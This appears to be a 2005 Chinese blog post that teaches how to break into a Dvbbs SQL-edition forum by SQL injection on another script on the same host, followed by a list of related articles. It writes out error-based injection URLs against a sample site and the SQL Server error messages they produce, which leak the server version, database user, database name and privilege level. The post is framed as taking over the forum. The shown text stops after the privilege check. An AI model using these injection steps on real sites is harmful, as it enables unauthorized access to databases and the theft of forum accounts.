再谈SQL注入入侵动网SQL版论坛

原创 2005年02月28日 17:41:00
  现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

  一、 首先确定目标

  假设以下URL存在SQL注入:
http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。
http://www.loveyou.com/type.aspid=6' 返回错误提示:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。


  继续,先探测一下系统版本:
http://www.loveyou.com/type.asp?id=(select @@version)--
  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。


  看来已经打上最新的SP4补丁。

  取得当前连接数据库用户:
http://www.loveyou.com/type.asp?id=(select user_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'webuser' 转换为数据类型为 int 的列时发生语法错误。


  从错误信息中得到当前数据库用户为:webuser
  取得当前连接数据库名:
http://www.loveyou.com/type.asp?id=(select db_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '01city' 转换为数据类型为 int 的列时发生语法错误。


  从错误信息中得到当前数据库名为: 01city

  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)
http://www.loveyou.com/type.asp?id=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

  返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,
http://www.loveyou.com/type.asp?id=(SELECT%20IS_MEMBER('db_owner'))--

  正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

动网论坛8.2经典注入漏洞利用

一、实验目的 理解动网论坛8.2原理 二、实验原理 动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。 三、实验环境 本机:192.168....
  • lijia111111
  • lijia111111
  • 2017年01月23日 21:16
  • 1593

再谈SQL注入入侵动网SQL版

编辑前言:  这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其...
  • aspstu
  • aspstu
  • 2005年01月11日 21:18
  • 45090

再谈SQL注入入侵动网SQL版

编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据...
  • Aimar168
  • Aimar168
  • 2004年09月27日 17:08
  • 653

SQL注入入侵动网SQL版论坛

  现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见...
  • Test_sunny
  • Test_sunny
  • 2008年08月03日 09:15
  • 1046

SQL注入--入侵动网

编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据...
  • huashaohack
  • huashaohack
  • 2012年01月31日 13:42
  • 928

SQL注入入侵动网SQL

编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据...
  • wtj198714
  • wtj198714
  • 2010年02月24日 19:24
  • 327

sql注入 js脚本注入 html入侵(自己收集的一些解决方案)欢迎指正

sql注入 js脚本注入 html入侵sql注入简介通俗的讲,SQL注入就是恶意黑客或者竞争对手利用现有的B/S或者C/S架构的系统,将恶意的SQL语句通过表单等传递给后台SQL数据库引擎执行。比如,...
  • alleged
  • alleged
  • 2017年01月12日 16:00
  • 3739

网站入侵工具 SQL注入神器

SQL注入神器
  • qq240263894
  • qq240263894
  • 2017年05月02日 00:37
  • 5509

动网论坛7.1sp1,博客存在安全漏洞及解决

我们在boke.asp文件后边的参数加入"",如 boke.asp?lantian.index.html 加个"" 变成boke.asp?lantian.index.html,发现报错。这一下为sql...
  • yadier
  • yadier
  • 2006年02月22日 00:49
  • 1210

实例讲解黑客如何执行SQL注入攻击

一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在...
  • lishimin1012
  • lishimin1012
  • 2015年01月27日 20:33
  • 803
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:再谈SQL注入入侵动网SQL版论坛
举报原因:
原因补充:

(最多只允许输入30个字)